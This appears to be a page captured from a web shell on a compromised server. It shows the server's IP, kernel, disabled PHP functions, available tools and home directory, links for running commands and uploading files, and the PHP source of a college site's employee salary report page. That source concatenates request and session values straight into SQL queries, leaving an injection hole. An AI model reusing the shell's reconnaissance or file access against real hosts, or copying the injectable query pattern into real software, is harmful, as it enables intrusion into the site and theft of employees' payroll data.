Server IP : 103.191.208.50 / Your IP : 216.73.216.53 Web Server : LiteSpeed System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64 User : celkcksm ( 1031) PHP Version : 7.4.33 Disable Function : show_source, system, shell_exec, passthru, popen, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/celkcksm/websites/vtti.e-campus.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include ("include/makeSession.php"); $installment_id=mysqli_query($con,"select * from admin where id='".$_SESSION["ecomid"]."'"); $installment_id=mysqli_fetch_array($installment_id); $installment_id=$installment_id['menuper']; $menuper=explode(',',$installment_id); if(in_array('Manage Payrool',$menuper)){ }else{ header("location:index.php"); } include("include/header.php"); //include("include/sidebar.php"); if(isset($_REQUEST['upid']) && $_REQUEST['upid']!=''){ $dovalue="editrest"; $doid=$_REQUEST['upid']; $upuserresult=mysqli_query($con,"select * from restaurant where id='".$_REQUEST['upid']."'"); $upuserarr=mysqli_fetch_array($upuserresult); }else{ $dovalue="addrest"; $doid=''; } ?> <div style="background-color:#999"> <div class="content container"> <div class="row cols-wrapper"> <!--//col-md-3--> <div class="col-md-12"> <section class="course-finder"> <h1 class="section-heading text-highlight"><span class="line"> Employee Salary Payment Report </span></h1> <div class="section-content"> <div class="row"> <div class="col-md-2 col-sm-2 subject" style="margin-top: 5px;"> <label for="name">Employee Id </label> </div> <div class="col-md-2 col-sm-2 subject" style="margin-top: 5px;"> <input name="ctl00$ContentPlaceHolder1$txtEmployeeId" type="text" id="ContentPlaceHolder1_txtEmployeeId" class="form-control" placeholder="Employee Id "> </div> <div class="col-md-2 col-sm-2 subject" style="margin-top: 5px;"> <select name="ctl00$ContentPlaceHolder1$ddlSearch" id="ContentPlaceHolder1_ddlSearch" class="form-control"> <option selected="selected" value="NA">Select</option> <option value="10">PF</option> <option value="11">TA</option> <option value="12">DA</option> <option value="13">ESI</option> <option value="14">Tax</option> </select> </div> <div class="col-md-2 col-sm-2 subject" style="margin-top: 5px;"> <input type="submit" name="ctl00$ContentPlaceHolder1$btnSearch" value="Search" id="ContentPlaceHolder1_btnSearch" class="btn btn-theme"> <div> <span id="ContentPlaceHolder1_lblmsg"></span> </div> </div> </div> </div> </section> </div> </div> <div class="row cols-wrapper"> <!--//col-md-3--> <div class="col-md-12"> <section class="course-finder"> <input type="submit" name="ctl00$ContentPlaceHolder1$btnexport" value="Export" id="ContentPlaceHolder1_btnexport" class="btn btn-theme"> <h1 class="section-heading text-highlight"><span class="line">Employee Salary Details : </span></h1> <div class="table-responsive"> <div> </div> <!--//table--> </div> <!--//section-content--> </section> </div> <!--//col-md-3--> </div> </div> </div> <?php include('include/footer.php');?> <script src="plugins/datatables/jquery.dataTables.min.js" type="text/javascript"></script> <script src="plugins/datatables/dataTables.bootstrap.min.js" type="text/javascript"></script> <script src="bootstrap/js/dataTables.buttons.min.js" type="text/javascript"></script> <script src="bootstrap/js/jszip.min.js" type="text/javascript"></script> <script src="bootstrap/js/pdfmake.min.js" type="text/javascript"></script> <script src="bootstrap/js/vfs_fonts.js" type="text/javascript"></script> <script src="bootstrap/js/buttons.html5.min.js" type="text/javascript"></script> <script src="bootstrap/js/buttons.print.min.js" type="text/javascript"></script> <script src="bootstrap/js/buttons.colVis.min.js" type="text/javascript"></script> <script src="bootstrap/js/buttons.flash.min.js" type="text/javascript"></script> <script type="text/javascript"> $(document).ready(function() { $('#example1').DataTable( { dom: 'Bfrtip', columnDefs: [ { targets: 1, className: 'noVis' } ], buttons: [ { extend: 'colvis', columns: ':not(.noVis)' } ], buttons: [ { extend: 'colvis', text: 'COLOUMNS' }, { extend: 'csv', text: 'Export to CSV' }, { extend: 'excel', text: 'Export to Excel' }, { extend: 'pdfHtml5', text: 'Create PDF', orientation: 'landscape', exportOptions: { columns: ':visible' } }, { extend: 'print', text: 'Print', exportOptions:{columns: ':visible',autoPrint: true}} ], } ); } ); //$(function () { //$("#example1").DataTable(); //}); </script>